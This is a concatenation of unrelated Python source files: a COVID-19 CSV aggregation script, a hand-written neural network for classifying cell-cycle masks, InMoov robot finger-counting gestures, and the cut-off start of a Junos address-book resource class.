def filter_date(filename, resultfile, dateRange):
    """Aggregate a pre-filtered CSV into per-day totals written to *resultfile*.

    Rows of *filename* (layout: date,country,countryCode,province,...,
    confirmed,suspected,cured,dead) are grouped by day offset from
    2019-12-01 (classic matplotlib day number 737394); for each day the
    confirmed/suspected/cured/dead columns are summed and one output row
    ``[date, confirmed, suspected, cured, dead]`` is emitted.

    NOTE(review): the *dateRange* parameter is currently unused.
    NOTE(review): relies on is_between_time() and mdate
    (matplotlib.dates) defined/imported elsewhere in this file;
    mdate.strpdate2num has been removed from recent matplotlib.
    """
    reader = csv.reader(open(filename, encoding='utf-8'))
    filetowrite = open(resultfile, 'w', newline='', encoding='utf-8')
    writer = csv.writer(filetowrite)
    date2num = mdate.strpdate2num('%Y-%m-%d')
    # date2str= str2date.strftime('%Y-%m-%d')
    num1 = 0   # day offset of the row currently being read
    num = 0    # day offset of the group currently being accumulated
    #dateRange1 = int( date2num(dateRange) - date2num('2019-12-01')); num = num1 = 0
    k = 0      # 0 until the first accumulated row is seen, then a sentinel
    # Per-day accumulators (200 slots ~ five months of days).
    sum_temp1 = [0] * 200 # five months
    sum_temp2 = [0] * 200
    sum_temp3 = [0] * 200
    sum_temp4 = [0] * 200
    j = 0      # index of the current day slot in the accumulators
    # sum_date = []
    for line in reader:
        # print(line)
        list2 = []
        if k < 0:
            # NOTE(review): unreachable — k is never negative.
            k = k + 1
        else:
            if k == 0:
                # First row: establish the starting day offset.
                num1 = confirm_date(line[0], float(737394))
                if is_between_time(line, 737394 + num1):
                    # print('--------if k==1 between---------', sum_temp1,'buchongshu',num1)
                    sum_temp1[j] = sum_temp1[j] + int(line[7])
                    sum_temp2[j] = sum_temp2[j] + int(line[8])
                    sum_temp3[j] = sum_temp3[j] + int(line[9])
                    sum_temp4[j] = sum_temp4[j] + int(line[10])
                    num = num1
                    k = 10000000000
                    # print('sum_temp line[7]', j, line[7], sum_temp1[j],'buchongshu',num1, num, k)
            else:
                num1 = confirm_date(line[0], float(737394))
                # print(num1,num,'else fenzhi -=---==-================')
                if num < num1 :
                    # Day changed: flush the finished day's totals, then
                    # start accumulating the new day.
                    # k = 10000000
                    list2.append(mdate.num2date(737394 + num).strftime('%Y-%m-%d'))
                    list2.append(sum_temp1[j])
                    list2.append(sum_temp2[j])
                    list2.append(sum_temp3[j])
                    list2.append(sum_temp4[j])
                    # print(list2)
                    writer.writerow(list2)
                    j = j + 1
                    if is_between_time(line, 737394 + num1):
                        # print('--------else if between---------', sum_temp1)
                        sum_temp1[j] = sum_temp1[j] + int(line[7])
                        sum_temp2[j] = sum_temp2[j] + int(line[8])
                        sum_temp3[j] = sum_temp3[j] + int(line[9])
                        sum_temp4[j] = sum_temp4[j] + int(line[10])
                        # print('sum_temp[j] line[7] j', j, line[7], sum_temp1[j])
                        num = num1
                elif num == num1:
                    # Same day: keep accumulating.
                    if is_between_time(line, 737394 + num1):
                        # print('--------else else between---------', sum_temp1)
                        # sum_temp[j] = sum_temp[j] + int(line[7])
                        sum_temp1[j] = sum_temp1[j] + int(line[7])
                        sum_temp2[j] = sum_temp2[j] + int(line[8])
                        sum_temp3[j] = sum_temp3[j] + int(line[9])
                        sum_temp4[j] = sum_temp4[j] + int(line[10])
                        num = num1
                        # print('sum_temp[j] line[7]', j, line[7], sum_temp1[j])
    # Flush the final (still open) day.
    list2 = []
    list2.append(mdate.num2date(737394 + num1).strftime('%Y-%m-%d'))
    list2.append(sum_temp1[j])
    list2.append(sum_temp2[j])
    list2.append(sum_temp3[j])
    list2.append(sum_temp4[j])
    # print(list2)
    writer.writerow(list2)
    # sum_foreign.append(sum_temp)
    # writer.writerow(sum_foreign)
    filetowrite.close()
def get_suspected_num(filename, resultfile):
    """Copy the country-level rows of *filename* into *resultfile*.

    NOTE(review): despite its name, this is the same filter as
    full_of_all() — it selects is_country() rows, not a suspected count.
    """
    # Context managers close both handles even on error; the reader's
    # handle was previously opened inline and never closed.
    with open(filename, encoding='utf-8') as src, \
         open(resultfile, 'w', newline='', encoding='utf-8') as dst:
        writer = csv.writer(dst)
        for line in csv.reader(src):
            if is_country(line):
                writer.writerow(line)
def full_of_all(filename, resultfile):
    """Copy every country-level row (is_country) of *filename* to *resultfile*."""
    # Context managers close both handles even on error; the reader's
    # handle was previously opened inline and never closed.
    with open(filename, encoding='utf-8') as src, \
         open(resultfile, 'w', newline='', encoding='utf-8') as dst:
        writer = csv.writer(dst)
        for line in csv.reader(src):
            if is_country(line):
                writer.writerow(line)
def full_foreign(filename, resultfile, CountryCode):
    """Copy rows outside *CountryCode* (is_not_china) of *filename* to *resultfile*."""
    # Context managers close both handles even on error; the reader's
    # handle was previously opened inline and never closed.
    with open(filename, encoding='utf-8') as src, \
         open(resultfile, 'w', newline='', encoding='utf-8') as dst:
        writer = csv.writer(dst)
        for line in csv.reader(src):
            if is_not_china(line, CountryCode):
                writer.writerow(line)
def full_china(filename, resultfile, CountryCode):
    """Copy nation-level rows for *CountryCode* (is_china) of *filename* to *resultfile*."""
    # Context managers close both handles even on error; the reader's
    # handle was previously opened inline and never closed.
    with open(filename, encoding='utf-8') as src, \
         open(resultfile, 'w', newline='', encoding='utf-8') as dst:
        writer = csv.writer(dst)
        for line in csv.reader(src):
            if is_china(line, CountryCode):
                writer.writerow(line)
def full_without_hubei(filename, resultfile, CountryCode):
    """Copy non-Hubei rows (is_not_Hubei) of *filename* to *resultfile*."""
    # Context managers close both handles even on error; the reader's
    # handle was previously opened inline and never closed.
    with open(filename, encoding='utf-8') as src, \
         open(resultfile, 'w', newline='', encoding='utf-8') as dst:
        writer = csv.writer(dst)
        for line in csv.reader(src):
            if is_not_Hubei(line, CountryCode):
                writer.writerow(line)
#def full_of_all(filename,resultfile):
# reader = csv.reader(open(filename))
# filetowrite = open(resultfile,'w', newline='')
# writer = csv.writer(filetowrite)
# for line in reader:
# if is_country(line):
# #print(line)
# writer.writerow(line)
# filetowrite.close()
def get_province(filename, mainFile):
    """For each province listed in *filename*, extract its rows from *mainFile*.

    *filename* rows are expected as [?, provinceCode, provinceName, ...];
    output goes to Province/<name>.csv.
    """
    # 'with' closes the code-list file; it was previously opened inline
    # and never closed.
    with open(filename, encoding='utf-8') as codes:
        for line in csv.reader(codes):
            dstFile = 'Province/' + line[2] + '.csv'
            filter_China(mainFile, dstFile, line[1])
def get_country(filename, mainFile):
    """For each country listed in *filename*, extract its rows from *mainFile*.

    *filename* rows are expected as [?, countryCode, countryName, ...];
    output goes to Country/<name>.csv.
    """
    # 'with' closes the code-list file; it was previously opened inline
    # and never closed.
    with open(filename, encoding='utf-8') as codes:
        for line in csv.reader(codes):
            dstFile = 'Country/' + line[2] + '.csv'
            filter_foreign(mainFile, dstFile, line[1])
def get_full_foreign(mainFile):
    """Write all non-China rows of *mainFile* to FullWithoutChina/FullWithoutChina.csv."""
    full_foreign(mainFile, 'FullWithoutChina/FullWithoutChina.csv', 'CN')
def get_full_china(mainFile):
    """Write the nation-level China rows of *mainFile* to FullChina/FullChina.csv."""
    full_china(mainFile, 'FullChina/FullChina.csv', 'CN')
def get_full_without_Hubei(mainFile):
    """Write the non-Hubei rows of *mainFile* to FullWithoutHubei/FullWithoutHubei.csv."""
    full_without_hubei(mainFile, 'FullWithoutHubei/FullWithoutHubei.csv', 'CN')
def get_total(mainFile):
    """Write every country-level row of *mainFile* to FULL/FULL.csv."""
    full_of_all(mainFile, 'FULL/FULL.csv')
def main_data_prepare(fileNameOfAll, dateTime):
    """Regenerate every derived CSV from the master file *fileNameOfAll*.

    Produces the four aggregate extracts (China, foreign, without-Hubei,
    total), their per-day time series under DateOrder/, and the per
    province / per country splits.
    NOTE(review): *dateTime* is forwarded to filter_date, which currently
    ignores it.
    """
    get_full_china(fileNameOfAll)
    filter_date('FullChina/FullChina.csv','DateOrder/TimeTestFullChina.csv', dateTime)
    get_full_foreign(fileNameOfAll)
    filter_date('FullWithoutChina/FullWithoutChina.csv','DateOrder/TimeTestFullForeign.csv', dateTime)
    get_full_without_Hubei(fileNameOfAll)
    filter_date('FullWithoutHubei/FullWithoutHubei.csv','DateOrder/TimeTestWithoutHubei.csv', dateTime)
    get_total(fileNameOfAll)
    filter_date('FULL/FULL.csv','DateOrder/TimeTestFULL.csv', dateTime)
    get_province('ProvinceCode.csv',fileNameOfAll)
    get_country('CountryCode.csv',fileNameOfAll)
if __name__ == '__main__':
    # Master dataset; presumably an export of the Wuhan-2019-nCoV tracker
    # CSV — confirm the file is present in the working directory.
    fileNameOfAll='Wuhan-2019-nCoV.csv'
    # filter_foreign(fileNameOfAll,'Country/The Republic of Namibia.csv','The Republic of Namibia')
    dateTime='2020-03-21'
    # Current run: only regenerate the foreign extract and its time series.
    get_full_foreign(fileNameOfAll)
    filter_date('FullWithoutChina/FullWithoutChina.csv','DateOrder/TimeTestFullForeign.csv', dateTime)
    # Earlier experiments kept for reference:
    # filter_China('Wuhan-2019-nCoV.csv','Province/Xizang.csv','540000')
    # confirm_date('2020-01-02', float(737394) )
    # print('---------------------------------EEEEEEEEEEEEEEEEE------------------------')
    # get_full_china('Wuhan-2019-nCoV.csv')
    # filter_date('FullChina/FullChina.csv','DateOrder/TimeTestFullChina.csv', '2020-03-03')
    # get_full_foreign('Wuhan-2019-nCoV.csv')
    # filter_date('FullWithoutChina/FullWithoutChina.csv','DateOrder/TimeTestFullForeign.csv', '2020-03-03')
    # get_full_without_Hubei('Wuhan-2019-nCoV.csv')
    # filter_date('FullWithoutHubei/FullWithoutHubei.csv','DateOrder/TimeTestWithoutHubei.csv', '2020-03-03')
    # get_total('Wuhan-2019-nCoV.csv')
    # filter_date('FULL/FULL.csv','DateOrder/TimeTestFULL.csv', '2020-03-03')
# |
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from scipy.stats import truncnorm
import pickle
import os
from sklearn import preprocessing
import scipy.io as sio
import matplotlib.gridspec as gridspec
import progressbar
from pprint import pprint
import copy
import time
# Side length (pixels) of the square frame each cell mask is centred in.
FRAME_SIZE = 140
# Epoch counts at which intermediate weight snapshots are collected
# during training (see NeuralNetwork.train).
test_epochs=[10,25,50,75,90,100,200,250,300,400,500]
#test_epochs=[1,5,10,25,50,100]
def truncated_normal(mean, sd, low, upp):
    """Frozen truncated-normal distribution with support [low, upp]."""
    # scipy's truncnorm expects the bounds expressed in standard
    # deviations relative to the mean, hence the rescaling.
    a = (low - mean) / sd
    b = (upp - mean) / sd
    return truncnorm(a, b, loc=mean, scale=sd)
def sigmoid(x):
    """Logistic activation: maps a real number (or ndarray) into (0, 1)."""
    return 1.0 / (1.0 + np.exp(-x))
# Activation used by the network for both training and inference.
activation_function = sigmoid
class NeuralNetwork:
    """Fully connected feed-forward network trained with per-sample
    (stochastic) backpropagation.

    Weights live in self.weights_matrices: one (nodes_out,
    nodes_in [+1 bias column]) ndarray per layer transition.
    """
    def __init__(self,
                 network_structure, # ie. [input_nodes, hidden1_nodes, ... , hidden_n_nodes, output_nodes]
                 learning_rate,
                 bias=None
                 ):
        self.structure = network_structure
        self.learning_rate = learning_rate
        # When truthy, a constant node carrying this value is appended to
        # every layer's input vector.
        self.bias = bias
        self.create_weight_matrices()
    def create_weight_matrices(self):
        """Initialise one truncated-normal weight matrix per layer transition."""
        # NOTE(review): this first X is dead code — it is overwritten
        # inside the loop before any sampling happens.
        X = truncated_normal(mean=2, sd=1, low=-0.5, upp=0.5)
        bias_node = 1 if self.bias else 0
        self.weights_matrices = []
        layer_index = 1
        no_of_layers = len(self.structure)
        while layer_index < no_of_layers:
            nodes_in = self.structure[layer_index-1]
            nodes_out = self.structure[layer_index]
            n = (nodes_in + bias_node) * nodes_out
            # Scale the sampling interval by 1/sqrt(fan_in).
            rad = 1 / np.sqrt(nodes_in)
            # NOTE(review): mean=2 lies outside [-rad, rad], so sampling
            # concentrates near the upper bound — confirm this is intended.
            X = truncated_normal(mean=2, sd=1, low=-rad, upp=rad)
            wm = X.rvs(n).reshape((nodes_out, nodes_in + bias_node))
            self.weights_matrices.append(wm)
            layer_index += 1
    def train_single(self, input_vector, target_vector):
        """One forward + backward pass, updating the weights in place.

        input_vector and target_vector can be tuple, list or ndarray.
        """
        no_of_layers = len(self.structure)
        input_vector = np.array(input_vector, ndmin=2).T
        layer_index = 0
        # The output/input vectors of the various layers:
        res_vectors = [input_vector]
        # ---- forward pass, keeping every layer's activations ----
        while layer_index < no_of_layers - 1:
            in_vector = res_vectors[-1]
            # adding bias node to the end of the 'input'_vector
            if self.bias:
                in_vector = np.concatenate((in_vector,[[self.bias]]))
                res_vectors[-1] = in_vector
            x = np.dot(self.weights_matrices[layer_index], in_vector)
            out_vector = activation_function(x)
            res_vectors.append(out_vector)
            layer_index += 1
        # ---- backward pass ----
        layer_index = no_of_layers - 1
        target_vector = np.array(target_vector, ndmin=2).T
        # The input vectors to the various layers
        output_errors = target_vector - out_vector
        while layer_index > 0:
            out_vector = res_vectors[layer_index]
            in_vector = res_vectors[layer_index-1]
            # Hidden layers carry a trailing bias activation that has no
            # incoming weights; drop it before computing the gradient.
            if self.bias and not layer_index==(no_of_layers-1):
                out_vector = out_vector[:-1,:].copy()
            # Gradient of the sigmoid: out * (1 - out), scaled by the error.
            tmp = output_errors * out_vector * (1.0 - out_vector)
            tmp = np.dot(tmp, in_vector.T)
            self.weights_matrices[layer_index-1] += self.learning_rate * tmp
            # Propagate the error one layer back.
            output_errors = np.dot(self.weights_matrices[layer_index-1].T,output_errors)
            if self.bias:
                output_errors = output_errors[:-1,:]
            layer_index -= 1
    def train(self, data_array,
              labels_one_hot_array,
              epochs=1,
              intermediate_results=False):
        """Train on the whole data set for *epochs* epochs.

        Returns deep-copied snapshots of the weight matrices taken at the
        epoch counts listed in the module-level test_epochs.
        NOTE(review): *intermediate_results* is currently ignored;
        snapshots are always collected.
        """
        bar = progressbar.ProgressBar(maxval=epochs, widgets=[progressbar.Bar('=', '[', ']'), ' ', progressbar.Percentage()])
        bar.start()
        intermediate_weights = []
        count=1
        for epoch in range(epochs):
            for i in range(len(data_array)):
                self.train_single(data_array[i], labels_one_hot_array[i])
            if (count in test_epochs):
                intermediate_weights.append(copy.deepcopy(self.weights_matrices))
            bar.update(count)
            count += 1
        bar.finish()
        return intermediate_weights
    def run(self, input_vector):
        """Forward pass; returns the output-layer activations as a column vector.

        input_vector can be tuple, list or ndarray.
        """
        no_of_layers = len(self.structure)
        # adding bias node to the end of the input_vector
        if self.bias:
            input_vector = np.concatenate( (input_vector, [self.bias]) )
        in_vector = np.array(input_vector, ndmin=2).T
        layer_index = 1
        # The input vectors to the various layers
        while layer_index < no_of_layers:
            x = np.dot(self.weights_matrices[layer_index-1],in_vector)
            out_vector = activation_function(x)
            # input vector for next layer
            in_vector = out_vector
            if self.bias:
                in_vector = np.concatenate( (in_vector,[[self.bias]]) )
            layer_index += 1
        return out_vector
    def evaluate(self, data, labels):
        """Return (correct, wrong) prediction counts over *data*/*labels*."""
        corrects, wrongs = 0, 0
        for i in range(len(data)):
            res = self.run(data[i])
            # argmax over the output activations is the predicted class.
            res_max = res.argmax()
            if res_max == labels[i]:
                corrects += 1
            else:
                wrongs += 1
        return corrects, wrongs
    def precision(self, label, confusion_matrix):
        """Precision for *label*: diagonal / column sum of the confusion matrix."""
        col = confusion_matrix[:, label]
        return confusion_matrix[label, label] / col.sum()
    def recall(self, label, confusion_matrix):
        """Recall for *label*: diagonal / row sum of the confusion matrix."""
        row = confusion_matrix[label, :]
        return confusion_matrix[label, label] / row.sum()
def set_class(x):
    """Map a cell-cycle label string to an integer class id (0-5).

    Exact labels: G1->0, S->3, G2->4.  Transitional labels containing
    both phases: S&G1->1, S&G2->2.  Anything else -> 5.
    """
    exact = {'G1': 0, 'S': 3, 'G2': 4}
    if x in exact:
        return exact[x]
    if 'S' in x and 'G1' in x:
        return 1
    if 'S' in x and 'G2' in x:
        return 2
    return 5
def set_color(x):
    """Map a cell-cycle label string to a plot colour.

    Exact labels: G1->red, S->blue, G2->green.  Transitional labels:
    S&G1->yellow, S&G2->orange.  Anything else -> black.
    """
    exact = {'G1': 'red', 'S': 'blue', 'G2': 'green'}
    if x in exact:
        return exact[x]
    if 'S' in x and 'G1' in x:
        return 'yellow'
    if 'S' in x and 'G2' in x:
        return 'orange'
    return 'black'
class Cell_Info:
    """Bounding box, area, intensity and cycle class of one cell mask.

    Matrix is a 2-D array of pixel intensities where background pixels
    are 0 (callers pass np.matrix masks loaded from .mat files — the
    exact dtype/shape conventions come from those files; confirm before
    reuse).
    """
    def __init__(self,Matrix,CellCycle):
        self.Matrix = Matrix
        # (row, col) index pairs of every non-zero (foreground) pixel.
        self.Index = np.asarray(np.where(Matrix>0)).T
        # Tight bounding box of the foreground pixels.
        self.y_min = min(self.Index[:,0])
        self.y_max = max(self.Index[:,0])
        self.x_min = min(self.Index[:,1])
        self.x_max = max(self.Index[:,1])
        # Number of foreground pixels.
        self.Area = np.count_nonzero(self.Matrix)
        # Sum of all pixel values.
        self.Intensity = self.Matrix.sum()
        self.CellCycle = str(CellCycle)
        self.Class = set_class(str(CellCycle))
#_______________________________________________________________________________
#_______________________________________________________________________________
#_______________________________________________________________________________
#____________________________________MAIN_______________________________________
#_______________________________________________________________________________
#_______________________________________________________________________________
#_______________________________________________________________________________
if __name__ == "__main__":
    # new_data == 1: rebuild the pickled data set from the .mat files;
    # otherwise load the previously pickled split from disk.
    new_data=0
    if (new_data==1) :
        count_files=0
        count_cells = 0
        dir = os.getcwd()
        dirs=[]
        dirs.append(dir)
        for dir in dirs:
            print("DIR: ",dir)
            cells=[]
            i=0 #Used to transverse the cells list when printing the images
            for roots, dirs, files in os.walk(dir):
                for file in files:
                    if file.endswith('.mat'):
                        path = os.path.realpath(os.path.join(roots,file))
                        print("PATH: ",path)
                        data = (sio.loadmat(path,struct_as_record=True))['storage']
                        for case in data:
                            count_cells += 1
                            # Keep only classes 0-2 (G1, S&G1, S&G2).
                            if (set_class(case['CellCycle'][0][0]) < 3):
                                cells.append(Cell_Info(np.matrix(case['Mask'][0]),case['CellCycle'][0][0]))
                        count_files += 1
                        """
                        #Routine used to print all cells from a mat file as an image
                        fig=plt.figure(frameon=False)
                        final_mask=np.zeros_like(cells[0].Matrix)
                        for index in range(i,len(cells)):
                        final_mask += cells[index].Matrix
                        i += 1
                        plt.imshow(final_mask, cmap='Blues',interpolation='nearest')
                        plt.show()
                        """
            print(count_files, "file(s) found")
            print(count_cells, "cell(s) found,", len(cells), "cell(s) used")
            """
            #Routine used to determine the maximum cell size and thus choose an
            #appropriate input size (in this case 140x140)
            pix_size=[]
            for cell in cells:
            pix_size.append([(cell.y_max-cell.y_min),(cell.x_max-cell.x_min)])
            pix_size=np.array(pix_size)
            print(np.amax(pix_size,axis=0))
            """
            """
            #Routine used to check if all information is correct
            print('=================================================')
            for i in range(10):
            print("Y:",cells[i].y_min,cells[i].y_max)#Y min and max
            print("X:",cells[i].x_min,cells[i].x_max)#X min and max
            print(cells[i].Intensity)
            print(cells[i].Area)
            print(cells[i].CellCycle)
            print(cells[i].Class)
            print('=================================================')
            """
            #With all the cells cells in a list, and an input size chosen it is
            #time to create the input for the neural network itself
            # Centre each mask inside a FRAME_SIZE x FRAME_SIZE frame.
            treated_cells=[]
            for cell in cells:
                S_mask=np.zeros((FRAME_SIZE,FRAME_SIZE))
                y_diff = cell.y_max - cell.y_min
                x_diff = cell.x_max - cell.x_min
                if (y_diff > FRAME_SIZE or x_diff > FRAME_SIZE):
                    print("Impossible to fit cell, please increase frame size")
                else:
                    y_offset = int((FRAME_SIZE-y_diff)/2)
                    x_offset = int((FRAME_SIZE-x_diff)/2)
                    S_mask[y_offset:y_diff+y_offset+1,x_offset:x_diff+x_offset+1] = cell.Matrix[cell.y_min : cell.y_max+1, cell.x_min:cell.x_max+1]
                    treated_cells.append(Cell_Info(S_mask.astype(float),cell.CellCycle))
            del cells
            labeled_data = np.array([(cell.Matrix,int(cell.Class)) for cell in treated_cells])
            # Scale pixel intensities (255-based) into a small range.
            fac = 255 *0.99 + 0.01
            labeled_data[:,0]=labeled_data[:,0]/fac
            #==============DATA RANDOMIZING===============
            #np.random.shuffle(labeled_data)
            # 90/10 train/test split.
            size_of_learn_sample = int(len(labeled_data)*0.9)
            train_data = labeled_data[:size_of_learn_sample]
            test_data = labeled_data[size_of_learn_sample:]
            #===============TRAINING DATA=================
            train_labels = train_data[:,1].astype(int)
            #train_labels = train_labels.reshape(train_labels.size,1).astype(int)
            train_data = train_data[:,0]
            #train_data = train_data.reshape(train_data.size,1)
            #===============TESTING DATA===================
            test_labels = test_data[:,1].astype(int)
            #test_labels = test_labels.reshape(test_labels.size,1).astype(int)
            test_data = test_data[:,0]
            #test_data = test_data.reshape(test_data.size,1)
            #=========================ONE HOT FORMAT=======================
            no_of_different_labels = 3
            train_labels_one_hot = np.zeros((train_labels.size,no_of_different_labels))
            test_labels_one_hot = np.zeros((test_labels.size,no_of_different_labels))
            train_labels_one_hot[np.arange(train_labels.size),train_labels.T] = 1
            test_labels_one_hot[np.arange(test_labels.size),test_labels.T] = 1
            # Soften the one-hot targets so sigmoid outputs can reach them.
            train_labels_one_hot[train_labels_one_hot==0] = 0.01
            train_labels_one_hot[train_labels_one_hot==1] = 0.99
            test_labels_one_hot[test_labels_one_hot==0] = 0.01
            test_labels_one_hot[test_labels_one_hot==1] = 0.99
            #print(np.hstack((test_labels.reshape(test_labels.size,1).astype(int), test_labels_one_hot)))
            #==================SAVING DATA===================================
            with open("/Users/Rafa/Google Drive/Faculdade/Tese/Projecto/Treated_Data/pickled_cells.pkl", "bw") as fh:
                data = (train_data,
                        test_data,
                        train_labels,
                        test_labels,
                        train_labels_one_hot,
                        test_labels_one_hot)
                pickle.dump(data, fh)
    else:
        # Load the previously pickled split.
        with open("/Users/Rafa/Google Drive/Faculdade/Tese/Projecto/Treated_Data/pickled_cells.pkl", "br") as fh:
            data = pickle.load(fh)
        train_data = data[0]
        test_data = data[1]
        train_labels = data[2]
        test_labels = data[3]
        train_labels_one_hot = data[4]
        test_labels_one_hot = data[5]
    # Flatten each 2-D frame into a 1-D input vector.
    for i in range(len(train_data)):
        train_data[i]=train_data[i].ravel()
    for i in range(len(test_data)):
        test_data[i]=test_data[i].ravel()
    epochs = 500
    #test_epochs=[500,1000,5000,10000,15000,20000,25000,30000]
    image_size=FRAME_SIZE*FRAME_SIZE
    ANN = NeuralNetwork(network_structure=[image_size,500,500, 3],
                        learning_rate=0.01,
                        bias=1)
    start_time = time.time()
    print("Start time:",time.strftime("%H:%M:%S", time.gmtime(start_time)))
    print("Epochs: ",epochs, "\tTraining Size: ",len(train_data),"\tStructure: ",ANN.structure,"\tBias: ",ANN.bias,"\tLearning Rate: ",ANN.learning_rate)
    matrices=ANN.train(train_data, train_labels_one_hot, epochs=epochs, intermediate_results=True)
    elapsed_time = time.time() - start_time
    print("Elapsed time:",time.strftime("%H:%M:%S", time.gmtime(elapsed_time)))
    """
    print("============================================================================================")
    corrects, wrongs = ANN.evaluate(train_data, train_labels)
    print("accuracy train: ", corrects / ( corrects + wrongs))
    corrects, wrongs = ANN.evaluate(test_data, test_labels)
    print("accuracy test: ", corrects / ( corrects + wrongs))
    """
    # Evaluate each intermediate weight snapshot on train and test sets.
    i=0
    print("============================================================================================")
    for element in matrices:
        ANN.weights_matrices = element
        print("Epochs: ",test_epochs[i])
        corrects, wrongs = ANN.evaluate(train_data, train_labels)
        print("accuracy train: ", corrects / ( corrects + wrongs))
        corrects, wrongs = ANN.evaluate(test_data, test_labels)
        print("accuracy: test", corrects / ( corrects + wrongs))
        print("============================================================================================")
        i += 1
|
#Each gesture correspond to a number showed by the hand
def oneFinger():
    """Hand-counting gesture for 'one' (MyRobotLab InMoov script).

    Relies on the global robot instance i01 and the shared rest()/relax()
    gestures defined elsewhere in the script.
    """
    # BUGFIX: startedGesture() was commented out while finishedGesture()
    # was still called; every sibling gesture calls both, so restore it
    # to keep the started/finished pairing balanced.
    i01.startedGesture()
    rest()
    i01.moveHead(64.00,94.00,76.93,58.72,0.00,129.00)
    i01.moveArm("left",90.00,60.00,83.00,15.00)
    i01.moveArm("right",5.20,90.20,30.20,12.20)
    sleep(2.5)
    i01.moveHand("left",0.00,180.00,180.00,180.00,180.00,90.20)
    i01.moveHand("right",0.00,0.00,0.00,0.00,0.00,90.20)
    i01.moveTorso(90.20,90.20,90.00)
    sleep(2)
    i01.finishedGesture()
    relax()
def twoFinger():
    """Hand-counting gesture for 'two' (MyRobotLab InMoov script).

    Relies on the global robot instance i01 and the shared rest()/relax()
    gestures defined elsewhere in the script.
    """
    i01.startedGesture()
    rest()
    i01.moveHead(64.00,94.00,95.00,90.00,0.00,38.00)
    i01.moveArm("left",90.00,60.00,83.00,15.00)
    i01.moveArm("right",5.20,90.20,30.20,12.20)
    sleep(2.5)
    i01.moveHand("left",0.00,0.00,180.00,180.00,180.00,90.20)
    i01.moveHand("right",0.00,0.00,0.00,0.00,0.00,90.20)
    i01.moveTorso(90.20,90.20,90.00)
    sleep(2)
    i01.finishedGesture()
    relax()
def threeFinger():
    """Hand-counting gesture for 'three' (MyRobotLab InMoov script)."""
    i01.startedGesture()
    rest()
    i01.moveHead(64.00,94.00,95.00,90.00,0.00,129.00)
    i01.moveArm("left",80.00,66.00,83.00,10.00)
    i01.moveArm("right",5.20,90.20,30.20,12.20)
    sleep(2.5)
    i01.moveHand("left",0.00,0.00,0.00,180.00,180.00,90.20)
    i01.moveHand("right",0.00,0.00,0.00,0.00,0.00,90.20)
    i01.moveTorso(90.20,90.20,90.00)
    sleep(2)
    i01.finishedGesture()
    relax()
def fourFinger():
    """Hand-counting gesture for 'four' (MyRobotLab InMoov script)."""
    i01.startedGesture()
    rest()
    i01.moveHead(43.00,94.00,90.00,90.00,0.00,129.00)
    i01.moveArm("left",80.00,58.00,75.00,10.00)
    i01.moveArm("right",5.20,90.20,30.20,12.20)
    sleep(2.5)
    i01.moveHand("left",0.00,0.00,0.00,0.00,180.00,90.20)
    i01.moveHand("right",0.00,0.00,0.00,0.00,0.00,90.20)
    i01.moveTorso(90.20,90.20,90.00)
    sleep(2)
    i01.finishedGesture()
    relax()
def fiveFinger():
    """Hand-counting gesture for 'five' (MyRobotLab InMoov script)."""
    i01.startedGesture()
    rest()
    i01.moveHead(46.00,90.00,122.17,64.06,0.00,74.37)
    i01.moveArm("left",88.00,58.00,75.00,10.00)
    i01.moveArm("right",5.20,90.20,30.20,12.20)
    sleep(2.5)
    i01.moveHand("left",0.00,0.00,0.00,0.00,0.00,90.20)
    i01.moveHand("right",0.00,0.00,0.00,0.00,0.00,90.20)
    i01.moveTorso(90.20,90.20,90.00)
    sleep(2)
    i01.finishedGesture()
    relax()
def sixFinger():
    """Hand-counting gesture for 'six' — brings the right arm up as well."""
    i01.startedGesture()
    rest()
    i01.moveHead(46.00,73.00,122.17,64.06,0.00,21.00)
    i01.moveArm("left",88.00,58.00,75.00,10.00)
    i01.moveArm("right",90.00,90.20,55.00,12.20)
    sleep(2.5)
    i01.moveHand("left",0.00,0.00,0.00,0.00,0.00,90.20)
    i01.moveHand("right",0.00,180.00,180.00,180.00,180.00,90.20)
    i01.moveTorso(90.20,90.20,90.00)
    sleep(2)
    i01.finishedGesture()
    relax()
def sevenFinger():
    """Hand-counting gesture for 'seven' (MyRobotLab InMoov script)."""
    i01.startedGesture()
    rest()
    i01.moveHead(90.00,70.00,122.17,64.06,0.00,21.00)
    i01.moveArm("left",55.00,58.00,75.00,10.00)
    i01.moveArm("right",90.00,90.20,55.00,12.20)
    sleep(2.5)
    i01.moveHand("left",0.00,0.00,0.00,0.00,0.00,90.20)
    i01.moveHand("right",0.00,0.00,180.00,180.00,180.00,90.20)
    i01.moveTorso(90.20,90.20,90.00)
    sleep(2)
    i01.finishedGesture()
    relax()
def eightFinger():
    """Hand-counting gesture for 'eight' (MyRobotLab InMoov script)."""
    i01.startedGesture()
    rest()
    i01.moveHead(72.00,64.00,122.17,64.06,0.00,0.00)
    i01.moveArm("left",86.00,58.00,75.00,16.00)
    i01.moveArm("right",90.00,93.00,58.00,12.20)
    sleep(2.5)
    i01.moveHand("left",0.00,0.00,0.00,0.00,0.00,90.20)
    i01.moveHand("right",0.00,0.00,0.00,180.00,180.00,90.20)
    i01.moveTorso(90.20,90.20,90.00)
    sleep(2)
    i01.finishedGesture()
    relax()
def nineFinger():
    """Hand-counting gesture for 'nine' — same pose as eightFinger with
    one more right-hand finger extended."""
    i01.startedGesture()
    rest()
    i01.moveHead(72.00,64.00,122.17,64.06,0.00,0.00)
    i01.moveArm("left",86.00,58.00,75.00,16.00)
    i01.moveArm("right",90.00,93.00,58.00,12.20)
    sleep(2.5)
    i01.moveHand("left",0.00,0.00,0.00,0.00,0.00,90.20)
    i01.moveHand("right",0.00,0.00,0.00,0.00,180.00,90.20)
    i01.moveTorso(90.20,90.20,90.00)
    sleep(2)
    i01.finishedGesture()
    relax()
def tenFinger():
    """Hand-counting gesture for 'ten' — both hands fully at the 0.00 position."""
    i01.startedGesture()
    rest()
    i01.moveHead(72.00,64.00,122.17,64.06,0.00,0.00)
    i01.moveArm("left",86.00,58.00,75.00,16.00)
    i01.moveArm("right",90.00,93.00,58.00,12.20)
    sleep(2.5)
    i01.moveHand("left",0.00,0.00,0.00,0.00,0.00,90.20)
    i01.moveHand("right",0.00,0.00,0.00,0.00,0.00,90.20)
    i01.moveTorso(90.20,90.20,90.00)
    sleep(2)
    i01.finishedGesture()
    relax()
|
# 3rd-party modules
from lxml.builder import E
# module packages
from ... import jxml as JXML
from .. import Resource
class SharedAddrBookSet( Resource ):
    """
    [edit security address-book <ab_name> address-set <name>]

    ~! WARNING !~
    This resource is managed only as a child of the :ZoneAddrBook:
